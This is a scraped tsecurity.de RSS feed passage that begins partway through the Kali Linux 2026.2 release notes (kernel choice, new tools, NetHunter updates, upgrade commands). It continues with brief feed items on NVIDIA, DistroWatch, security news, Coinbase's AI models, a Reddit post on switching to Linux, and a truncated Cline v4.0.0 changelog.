<p>For those who run Kali in Hyper-V, using the <a href="https://www.kali.org/docs/virtualization/install-hyper-v-guest-enhanced-session-mode/">Enhanced Session Mode</a>: you’re an xrdp user, even if you didn’t know it! We did our best to ensure a smooth transition, and yet we got reports that xrdp wasn’t functional after the upgrade. If ever you’re in this case, you can try to run <code>kali-tweaks</code>, and in the Virtualization section you can try to <strong>disable, and then enable again</strong> the Hyper-V Enhanced Session Mode. That might fix the issue. <strong>Don’t forget to reboot</strong>!</p>
<p>As always, if you’re still having issues after that, feel free to reach out on the <a href="https://bugs.kali.org/">Kali bug tracker</a>.</p>
<h2>Linux Kernel For This Release: 6.19</h2>
<p>Regarding the version of the <a href="https://pkg.kali.org/pkg/linux">Linux kernel</a> to include in this release of Kali, it’s been a tough decision.</p>
<p>On one hand, we’d like to release with the latest version of the Linux kernel, due to all the recent vulnerability disclosures (<a href="https://en.wikipedia.org/wiki/Copy_Fail">Copy Fail/CVE-2026-31431</a>, <a href="https://github.com/V4bel/dirtyfrag">Dirty Frag/CVE-2026-43284 &amp; CVE-2026-43500</a> and others ). On the other hand, when the 7.0 kernel reached Debian, there were <a href="https://bugs.debian.org/1135362">reports of incompatibilities with the NVidia DKMS drivers</a> .</p>
<p>We decided to release with a 6.19 kernel to avoid breaking <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia users</a>. At the same time, for <strong>those who prefer to get the latest kernel</strong> and don’t care about NVidia compatibility, <strong>we have the kernel 7.0 ready for you in <code>kali-experimental</code></strong>. Make sure to check our documentation that explains <a href="https://www.kali.org/docs/general-use/kali-apt-sources/#enabling-kali-additional-branches">how to enable the kali-experimental repository</a>. The 7.0 kernel is also available in kali-rolling, so you can just <a href="https://www.kali.org/docs/general-use/updating-kali/">update your whole system</a> and get the latest packages from <a href="https://www.kali.org/docs/general-use/kali-branches/">kali-rolling</a>.</p>
<h2>A Sneak Peek: Build Scripts</h2>
<p>Our <a href="https://gitlab.com/kalilinux/build-scripts/">build scripts</a> are what we use to produce every Kali image - ARM SBCs, Base (Installer and live ISOs), Cloud, Containers, VMs, WSL &amp; NetHunter/Pro. Each lives in its own repo, and over time they have each grown in slightly different directions. For the next release, Kali 2026.3, we are doing <strong>a consistency pass across all of them: same structure, same conventions, same behaviour throughout</strong>.</p>
<p>As a result of these changes, some CI pipelines or workflows may need tweaking.</p>
<h2>New Tools in Kali</h2>
<p>This release brings <strong>9 new tools</strong> <em>(to the network repositories)</em>. As always, we have been busy adding to the arsenal:</p>
<ul>
<li><a href="https://www.kali.org/tools/arsenal-ng/">arsenal-ng</a> - Go-based command library equipped with 200+ cybersecurity cheat-sheets</li>
<li><a href="https://www.kali.org/tools/hydra/">hydra-gtk</a> - [Re-added] Very fast network logon cracker - GTK+ based GUI</li>
<li><a href="https://www.kali.org/tools/legba/">legba</a> - Multiprotocol credentials bruteforcer / password sprayer and enumerator</li>
<li><a href="https://www.kali.org/tools/oletools/">oletools</a> - Analyze MS OLE2 files and MS Office documents</li>
<li><a href="https://www.kali.org/tools/penelope/">penelope</a> - Powerful shell handler</li>
<li><a href="https://www.kali.org/tools/shell-gpt/">shell-gpt</a> - Command-line productivity tool powered by AI large language models</li>
<li><a href="https://www.kali.org/tools/tailscale/">tailscale</a> - Secure connectivity platform</li>
<li><a href="https://www.kali.org/tools/tookie-osint/">tookie-osint</a> - OSINT information gathering tool for finding social media accounts</li>
<li><a href="https://www.kali.org/tools/uro/">uro</a> - Declutter URLs for crawling/pentesting</li>
</ul>
<p><em>There has also been numerous packages updates and new libraries as well. We also bump the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali kernel to 6.19</a>.</em></p>
<h2>Kali NetHunter Updates</h2>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" alt="Kali NetHunter EvilTwin">
</a>
</p>

<p>We have a tremendous amount of news for the lovers of mobile hacking! The <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">Kali NetHunter app</a> <strong>launches instantly</strong> now, various <strong>bugs have been fixed</strong> with the <a href="https://www.kali.org/docs/nethunter/nethunter-custom-commands/">custom commands</a> and <a href="https://www.kali.org/docs/nethunter/nethunter-chroot-manager/">chroot manager</a> . A <strong>new EvilTwin</strong> (Wi-Fi Fake AP) tab has been added with password verification captive portal, <em>which brought along a really needed iptables fix</em>. So now after using <a href="https://www.kali.org/docs/nethunter/nethunter-wifipumpkin/">Wifipumpkin3</a> or EvilTwin, Android Hotspot will work properly. Huge thanks to the incredible work by <a href="https://gitlab.com/dr1408">@dr.rootsu</a>. The <a href="https://www.kali.org/docs/nethunter/nethunter-kernel/">kernel flasher tab</a> has also <strong>received a refresh</strong>.</p>
<p>However, this release’s spotlight is on the beginning of the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#the-qcacld30-injection-story">Qcacld-3.0 injection patch</a> wave.</p>
<h3>The Qcacld3.0 Injection Story</h3>
<p>We finally came to a milestone, shout-out to all the developers that worked on injection through the <em>years</em>!</p>
<p><a href="https://gitlab.com/kimocoder">@kimocoder</a> easily spent more than anyone else on this goal. His original injection implementation came to life, on a specific device: the OnePlus Nord (AC2003). You can find the commit <a href="https://github.com/kimocoder/android_kernel_oneplus_avicii/commit/8eb5de1047e7bf069cb4de38c3a35489b35df189">here</a>. Then <a href="https://gitlab.com/Loukious">@Loukious</a> came in the mix and his modifications made it to work on other devices with <a href="https://github.com/Loukious/android_kernel_xiaomi_sm8150/commit/18c57c61ecd8f02de778e36db6be9b41167a8825">this port</a>. Finally, <a href="https://gitlab.com/cyberknight777">@cyberknight777</a> did some housekeeping, removed unnecessary changes, logging, and restored the correct authorship while attributing @Loukious as co-author. The result, <a href="https://github.com/Neternels/android_kernel_xiaomi_sunny/commit/1a4a7d313acc75cfca9a5e97673745d721b6ccea">this patch</a> is the <strong>almost universal</strong> one which brought many devices into the injection world, starting with the ones below for both kernel 4.x and 5.x versions:</p>
<ul>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-oneplus-7/">OnePlus 7</a> (LineageOS 23.2)</li>
<li>OnePlus 9 / 9 Pro</li>
<li>OnePlus Nord</li>
<li>POCO X3 Pro</li>
<li>Redmi Note 10</li>
<li>Samsung A73</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Xiaomi Mi A3</a> (LineageOS 23.2)</li>
<li>Xiaomi Poco X3 NFC (PixelOS Android 16)</li>
<li>Xiaomi Redmi Note 8</li>
</ul>
<h3>Wifite On TV</h3>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" alt="Kali Wifite Netflix Bloodhounds S02E01">
</a>
</p>

<p>In the meantime, his continuous work on improving <a href="https://www.kali.org/tools/wifite/">wifite</a> caught some attention - spotted on Netflix twice. Not bad!</p>
<h3>Magisk Standalone Kernel Installer</h3>
<p>The kernel flasher tab <em>(still experimental on some devices)</em> is back in a new shape, giving a hint for the possible future look for the NetHunter app.</p>
<p>The <strong>Magisk standalone kernel flashing support is now here</strong> - you can simply open any newly built kernel installer zip in the Magisk app that was built using the <a href="https://gitlab.com/kalilinux/nethunter/build-scripts/kali-nethunter-installer">kali-nethunter-installer</a>.</p>
<h3>New Kernels</h3>
<p>In addition to the kernels that now support the qcacld3 injection, there are several <a href="https://nethunter.kali.org/kernels.html">new versions and phones</a>:</p>
<ul>
<li>Google Pixel 6a (LineageOS 23.2)</li>
<li>Redmi 5A (crDroid 14)</li>
<li>Samsung Note 20 Ultra (Android 13)</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Samsung S10</a> (LineageOS 23.2)</li>
<li>Samsung S10 5G (LineageOS 23.2)</li>
<li>Samsung S10+ (LineageOS 23.2)</li>
<li>Samsung S10e (LineageOS 23.2)</li>
</ul>
<h3>NetHunter Pro</h3>
<p>Kali bare metal now on more phones! New devices added in build thanks to the awesome work by <a href="https://github.com/taygoth">@Max Furman</a>:</p>
<ul>
<li>Fairphone FP5 (QCM6490) (fp5)</li>
<li>Google Pixel 3 (SDM845) (blueline)</li>
<li>Google Pixel 3a (SDM670) (sargo)</li>
<li>Google Pixel 3a XL SDC panel (SDM670) (bonito-sdc)</li>
<li>Google Pixel 3a XL Tianma panel (SDM670) (bonito-tianma)</li>
<li>Google Pixel 4a (SDM730) (sunfish)</li>
<li>LG G7 ThinQ (SDM845) (judyln)</li>
<li>LG V35 ThinQ (SDM845) (judyp)</li>
<li>Samsung Galaxy S9 China (SDM845) (starqltechn)</li>
<li>SHIFTphone 8 (QCM6490) (otter)</li>
<li>Sony Xperia 10 III (SM6350) (pdx213)</li>
<li>Sony Xperia XZ2 (SDM845) (xperia-tama-apollo)</li>
<li>Sony Xperia XZ2 Compact (SDM845) (xperia-tama-akari)</li>
<li>Sony Xperia XZ2 Premium (SDM845) (xperia-tama-akatsuki)</li>
<li>Xiaomi Mi 10T Lite (SM7225) (toco)</li>
<li>Xiaomi Mi 9 Pro 5G (SM8150) (tucana)</li>
<li>Xiaomi Mi 9T Pro Samsung panel (SM8150) (davinci-samsung)</li>
<li>Xiaomi Mi 9T Pro Visionox panel (SM8150) (davinci-visionox)</li>
<li>Xiaomi Mi Mix 2S (SDM845) (polaris)</li>
<li>Xiaomi Poco X3 Huaxing panel (SM7150) (surya-huaxing)</li>
<li>Xiaomi Poco X3 Tianma panel (SM7150) (surya-tianma)</li>
<li>Xiaomi Redmi Note 10 Pro (SM7150) (sweet)</li>
</ul>
<h3>NetHunter Podcast Episode 3</h3>
<p><a href="https://gitlab.com/yesimxev">@yesimxev</a> and <a href="https://www.linkedin.com/in/kristopher-wilson-208b59123">@Kristopher Wilson</a> joined for a discussion about NetHunter in cars, and leveraging AI for Bug Bounty projects and more.</p>
<div>

</div>
<h2>Kali Website Updates</h2>
<p>Since our last release, Kali 2026.1, we have been keeping the website and documentation up-to-date. Here is a quick summary of what has changed.</p>
<h3>Kali Documentation</h3>
<p>Most of the <a href="https://www.kali.org/docs/">documentation</a> updates this cycle are around NetHunter device support and the new APT sources format. Pages which got something more than a tweak:</p>
<ul>
<li><a href="https://www.kali.org/docs/development/live-build-a-custom-kali-iso/">Creating A Custom Kali ISO</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/troubleshooting/handling-common-apt-errors/">Handling common APT problems</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10/">Installing NetHunter on the Samsung Galaxy S10</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro-3/">Installing NetHunter on the TicWatch Pro 3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-ticwatch-pro/">Installing NetHunter on the TicWatch Pro</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a2/">Installing NetHunter on the Xiaomi Mi A2</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Installing NetHunter on the Xiaomi Mi A3</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/nethunter/">Kali NetHunter</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/general-use/kali-apt-sources/">Kali Network Repositories (/etc/apt/sources.list)</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/introduction/default-credentials/">Kali’s Default Credentials</a> <em>(updated)</em></li>
<li><a href="https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/">Submitting Bugs for Kali Linux</a> <em>(updated)</em></li>
</ul>
<p>We also want to say a little thank you to the following for their work on the sites:</p>
<ul>
<li><a href="https://gitlab.com/chrisjr404">@Chris Southerland Jr</a></li>
<li><a href="https://gitlab.com/mr00k3">@mr00k3</a></li>
<li><a href="https://gitlab.com/Simeon53424">@Simeon_YT</a></li>
<li><a href="https://gitlab.com/V0lk3n">@V0lk3n</a></li>
</ul>
<p>Anyone can help out, anyone can get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<h3>New Kali Mirrors</h3>
<p>We welcomed <strong>1 new mirror</strong> during this release cycle, but that’s a significant one: <strong>our first mirror in Africa!</strong> Hoping that many others will follow ;)</p>
<p>The mirror is located in <strong>South Africa</strong>, online at <a href="https://mirror.africloud.com/kali/">mirror.africloud.com</a>. It is sponsored by <a href="https://africloud.com/">AFRICLOUD</a>, and was setup thanks to Oluniyi Ajao.</p>
<p>If you have the disk space and bandwidth, <a href="https://www.kali.org/docs/community/setting-up-a-kali-linux-mirror/">we always welcome new mirrors</a>.</p>
<hr>
<h2>Get Kali Linux 2026.2</h2>
<p><strong>Fresh Images</strong></p>
<p>So what’s stopping you? Go and <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>If you cannot wait for the next release, we also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> which include the latest packages at the time of download, meaning fewer updates needed on first boot. These are automated builds rather than QA’d releases like our standard <a href="https://www.kali.org/releases/">release images</a>, but we still welcome <a href="https://bugs.kali.org/">bug reports</a> on them. The earlier we catch issues, the sooner they get fixed.</p>
<p><strong>Existing Installs</strong></p>
<p>Using Kali already? Great! You can <a href="https://www.kali.org/docs/general-use/updating-kali/">keep it up-to-date</a> by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo tee /etc/apt/sources.list.d/kali.sources &lt;&lt; 'EOF'
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
EOF
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ sudo reboot -f
</code></pre>
<p><em>Remember, we recommend doing <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">a reboot for this release</a>!</em></p>
<p>You should now be on Kali Linux 2026.2. We can double check this by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2026.2"
VERSION_ID="2026.2"
VERSION_CODENAME="kali-rolling"
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.19.14-1+kali1 (2026-05-05)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.19.14+kali-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<hr>
<p>As always, if you run into anything broken, please <a href="https://bugs.kali.org/">report it</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<hr>
<p>Want to keep up-to-date easier? We’ve got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feed</a> and <a href="https://www.kali.org/newsletter/">newsletter</a></li>
<li><a href="https://www.kali.org/get-kali/">Download</a>? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li><a href="https://www.kali.org/docs/community/list-of-official-kali-sites/#social-media-networks">Socials</a>? <a href="https://bsky.app/profile/kalilinux.bsky.social">Bluesky</a>, <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[NVIDIA Takes Top Spot in Datacenter Ethernet Switching Market as Revenue Hits $15.4 Billion]]></title>
<description><![CDATA[NVIDIA has reached the top position in the datacenter Ethernet switching market for the first time, as demand for AI infrastructure continues to push networking…
The post NVIDIA Takes Top Spot in Datacenter Ethernet Switching Market as Revenue Hits $15.4 Billion appeared first on OnMSFT.]]></description>
<link>https://tsecurity.de/de/3631865/windows-tipps/nvidia-takes-top-spot-in-datacenter-ethernet-switching-market-as-revenue-hits-154-billion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631865/windows-tipps/nvidia-takes-top-spot-in-datacenter-ethernet-switching-market-as-revenue-hits-154-billion/</guid>
<pubDate>Mon, 29 Jun 2026 05:38:12 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>NVIDIA has reached the top position in the datacenter Ethernet switching market for the first time, as demand for AI infrastructure continues to push networking…</p>
<p>The post <a href="https://onmsft.com/news/nvidia-takes-top-spot-in-datacenter-ethernet-switching-market-as-revenue-hits-15-4-billion/">NVIDIA Takes Top Spot in Datacenter Ethernet Switching Market as Revenue Hits $15.4 Billion</a> appeared first on <a href="https://onmsft.com/">OnMSFT</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1179]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: PCLinuxOS 2026.05
News: COSMIC gets a new system monitor, Xfce tests new Wayland compositor, FreeBSD developers invite questions
Questions and answers: Tips for switching between distributi...]]></description>
<link>https://tsecurity.de/de/3631720/unix-server/distrowatch-weekly-issue-1179/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631720/unix-server/distrowatch-weekly-issue-1179/</guid>
<pubDate>Mon, 29 Jun 2026 02:31:12 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: PCLinuxOS 2026.05<br>
News: COSMIC gets a new system monitor, Xfce tests new Wayland compositor, FreeBSD developers invite questions<br>
Questions and answers: Tips for switching between distributions<br>
Released last week: SteamOS 3.8.10, KaOS 2026.06, Drauger OS 7.8, AnduinOS 2.0.0<br>
Torrent corner: CachyOS<br>
Opinion poll: Favourite release cycle?<br>
Website news:....]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-28 21h : 3 posts]]></title>
<description><![CDATA[3 posts were published in the last hour 18:34 : SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 103 18:34 : Romania’s Swift Response Stops Massive Cyberattack on Hospitals, Offers Global Lessons in Healthcare Security 18:34 : US Opens the Door for Trusted…
Read more →
The post IT Security News Hourly S...]]></description>
<link>https://tsecurity.de/de/3631437/it-security-nachrichten/it-security-news-hourly-summary-2026-06-28-21h-3-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631437/it-security-nachrichten/it-security-news-hourly-summary-2026-06-28-21h-3-posts/</guid>
<pubDate>Sun, 28 Jun 2026 21:08:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>3 posts were published in the last hour 18:34 : SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 103 18:34 : Romania’s Swift Response Stops Massive Cyberattack on Hospitals, Offers Global Lessons in Healthcare Security 18:34 : US Opens the Door for Trusted…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-28-21h-3-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-28-21h-3-posts/">IT Security News Hourly Summary 2026-06-28 21h : 3 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Romania’s Swift Response Stops Massive Cyberattack on Hospitals, Offers Global Lessons in Healthcare Security]]></title>
<description><![CDATA[  Romania’s healthcare system faced one of its biggest cyber crises in February 2024 when a widespread ransomware attack targeted hospitals across the country, disrupting critical medical services and exposing the growing vulnerability of healthcare infrastructure to cybercriminals. The attack…
R...]]></description>
<link>https://tsecurity.de/de/3631405/it-security-nachrichten/romanias-swift-response-stops-massive-cyberattack-on-hospitals-offers-global-lessons-in-healthcare-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631405/it-security-nachrichten/romanias-swift-response-stops-massive-cyberattack-on-hospitals-offers-global-lessons-in-healthcare-security/</guid>
<pubDate>Sun, 28 Jun 2026 20:38:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  Romania’s healthcare system faced one of its biggest cyber crises in February 2024 when a widespread ransomware attack targeted hospitals across the country, disrupting critical medical services and exposing the growing vulnerability of healthcare infrastructure to cybercriminals. The attack…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/romanias-swift-response-stops-massive-cyberattack-on-hospitals-offers-global-lessons-in-healthcare-security/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/romanias-swift-response-stops-massive-cyberattack-on-hospitals-offers-global-lessons-in-healthcare-security/">Romania’s Swift Response Stops Massive Cyberattack on Hospitals, Offers Global Lessons in Healthcare Security</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Coinbase joins the rush to Chinese AI models as Western labs face a pricing stress test]]></title>
<description><![CDATA[Coinbase CEO Brian Armstrong is switching his company to Chinese AI models like GLM 5.2 and Kimi 2.7. An automated routing system picks the best model for each request based on task and price, and better caching pushed the hit rate from 5 to 60 percent. Coinbase has cut its AI spending in half ev...]]></description>
<link>https://tsecurity.de/de/3631026/ai-nachrichten/coinbase-joins-the-rush-to-chinese-ai-models-as-western-labs-face-a-pricing-stress-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631026/ai-nachrichten/coinbase-joins-the-rush-to-chinese-ai-models-as-western-labs-face-a-pricing-stress-test/</guid>
<pubDate>Sun, 28 Jun 2026 14:18:45 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/06/tokenization-2.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Coinbase CEO Brian Armstrong is switching his company to Chinese AI models like GLM 5.2 and Kimi 2.7. An automated routing system picks the best model for each request based on task and price, and better caching pushed the hit rate from 5 to 60 percent. Coinbase has cut its AI spending in half even as token usage keeps climbing.</p>
<p>The article <a href="https://the-decoder.com/coinbase-joins-the-rush-to-chinese-ai-models-as-western-labs-face-a-pricing-stress-test/">Coinbase joins the rush to Chinese AI models as Western labs face a pricing stress test</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Switching from Windows to Linux]]></title>
<description><![CDATA[Hello strangers on the world of the internet. If you find this you are reading my journey switching from windows to linux. My hope is to share my story for those who are also looking to switch and give them a understand that I wish I had when doing my due diligence and scouring the web to learn m...]]></description>
<link>https://tsecurity.de/de/3629068/linux-tipps/switching-from-windows-to-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629068/linux-tipps/switching-from-windows-to-linux/</guid>
<pubDate>Sat, 27 Jun 2026 08:08:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello strangers on the world of the internet. If you find this you are reading my journey switching from windows to linux. My hope is to share my story for those who are also looking to switch and give them a understand that I wish I had when doing my due diligence and scouring the web to learn more. </p> <p><strong>Distro choice:</strong> <sup>Now when it come's to linux I got overwhelmed for a bit when it came to switching, for as you see, linux is not just one os, but the base in which people build os on. Their are so many versions of linux and if you don't like any of them you can make your own! The linux community calls all the different versions Distros, short for distribution. When it came to me and trying to figure out which one to chose I found myself deciding between three of them. Bazzite, Nobara, and CashyOS. These are the Distros I saw the community recommend the most for gaming. I was quick to eliminate CashyOS, not because it was bad, it just was not for me. From my understanding CashyOS is the least linux beginner friendly of the three as it requires some setting up to do before you can game, that being said, I feel like CashyOS is the best choice of the 3, if your willing to learn the in's and out's of linux, it offers a lot of optimizations to the base os allowing games to perform very well. Now Bazzite and Nobara are both Distros made with beginners in mind and don't need any set up in order to game and have a lot in common, however they take different approaches to get there. My take away of the biggest differences is how they update and how much control you have on changing things. Bazzite operates similar to a counsel os but with the addition of being a computer as well. Bazzite updates are best when it comes to stability, when there is one it saves the last version for 90 days in case the update is bugged or breaks something, and all you have to do to fix it is just switch back to the older version which is very easy. Bazzite is what linux calls a atomic Distro, meaning you can't change it and it comes as is, it being atomic is what allows the updates to be so stable. Bazzite is in my opinion the best beginner friendly option and if all you care about is playing your favorite game I'd say Bazzite if for you. Nobara is a mutable Distro, meaning you can change and modify the os. It also get's updates but it doesn't have the safety net that Bazzite offers from being a atomic Distro and you may find yourself needing to do some troubleshooting, however from what I've read it doesn't seem to be common for this to happen, and its more likely to occur if you start to heavily modify the os. I feel like Nobara is a great in-between of Bazzite and CashyOS, you get the game ready experience with the freedom to experiment and change things.</sup></p> <p><strong>Conclusion:</strong> <sup>It really now just comes down to preference on what you pick, there is no "best distro" as it all boils down to opinion and what you feel is right for you and what your comfortable with. For me I'm going with Nobara cause I want the freedom it offers and I hope to learn enough that I can make the switch to CashyOS in the future. I encourage anyone who is reading this to explore the linux community as the three Distros I named are just the one's I considered the most when deciding and you might find a Distro that speaks to your heart that you will love. I hope this help you on your journey on discovering linux. Have a great day!</sup></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Sexy-Beefy"> /u/Sexy-Beefy </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ugsm7w/switching_from_windows_to_linux/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ugsm7w/switching_from_windows_to_linux/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.0.0]]></title>
<description><![CDATA[Added

Add the SDK-backed VS Code extension runtime. Cline now runs tasks through the shared Cline SDK session layer for agent turns, tools, Plan/Act mode coordination, MCP, checkpoints, telemetry, provider changes, compaction, mistake limits, and task history.
Add ClinePass to the VS Code extens...]]></description>
<link>https://tsecurity.de/de/3628503/downloads/v400/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628503/downloads/v400/</guid>
<pubDate>Fri, 26 Jun 2026 22:16:57 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Added</h3>
<ul>
<li>Add the SDK-backed VS Code extension runtime. Cline now runs tasks through the shared Cline SDK session layer for agent turns, tools, Plan/Act mode coordination, MCP, checkpoints, telemetry, provider changes, compaction, mistake limits, and task history.</li>
<li>Add ClinePass to the VS Code extension, including onboarding, provider selection, signup and subscription handoff, live model lists, entitlement and organization error states, out-of-credit prompts, and clearer ClinePass auth/error handling.</li>
<li>Add the Customize marketplace for discovering and managing Skills, MCP servers, and Plugins from the extension, including installed/marketplace tabs, search and filtering, install/uninstall flows, enable/disable controls, and support for plugin-bundled skills.</li>
<li>Cline Plugins: Plugins let you extend Cline with custom tools, workflows, skills, and MCP-powered capabilities tailored to your team or project. Install them from the new Customize marketplace to add specialized behavior, connect external services, and package reusable automations—so Cline can do more than code: it can adapt to the way you work.</li>
<li>Add queued prompts in chat. Messages submitted while Cline is already working are now queued, shown while the current turn streams, and can be cancelled before they run.</li>
<li>Add edit-and-regenerate support for previous user messages, with clearer Reset Chat and Reset Code actions.</li>
<li>Add generic SDK provider settings and model-catalog support so more providers can share the same model picker, reasoning controls, dynamic model IDs, provider config persistence, and custom model handling.</li>
<li>Add additional SDK-backed provider exposure and model/provider updates, including ClinePass models, refreshed Cline catalog data, Fireworks GLM 5.2, Kimi K2.6 Fast, Kimi K2.7 Code, Qwen 3.7 Plus, MiniMax M3 updates, SAP AI Core wiring, LiteLLM model fetching, Codex OAuth credentials, and OpenAI-compatible model settings.</li>
<li>Add MCP support for plugins and shared marketplace install/uninstall plumbing used by the VS Code extension.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Migrate the VS Code extension from the legacy task implementation to the shared Cline SDK and move the extension build/package workflow to Bun.</li>
<li>Rework Plan/Act mode handling through SDK coordinators, including closer CLI parity and automatic continuation when switching from Plan to Act.</li>
<li>Rework provider and model configuration around <code>providers.json</code>, the model catalog, and SDK session config so settings are preserved consistently across provider switches and active sessions can restart when the selected provider changes.</li>
<li>Simplify provider settings UI by replacing many provider-specific views with shared generic settings components and consistent reasoning selectors.</li>
<li>Simplify terminal execution through the SDK run-commands path, including clearer non-interactive command guidance and safer structured command formatting.</li>
<li>Migrate legacy MCP files and formats into the shared settings file and protect MCP settings writes with safer locking/atomic updates.</li>
<li>Refresh the MCP hub automatically after marketplace installs so newly installed servers are available without a manual restart.</li>
<li>Reorganize MCP/Skills/Plugins entry points under Customize, hide workflows from the Customize menu, wrap Customize tabs on narrow screens, and allow the MCP Marketplace tab to be disabled remotely while installed MCP servers remain accessible.</li>
<li>Simplify auto-approval settings. Command auto-approval is now disabled by default for safer new and reset configurations, and the auto-approval UI has been streamlined.</li>
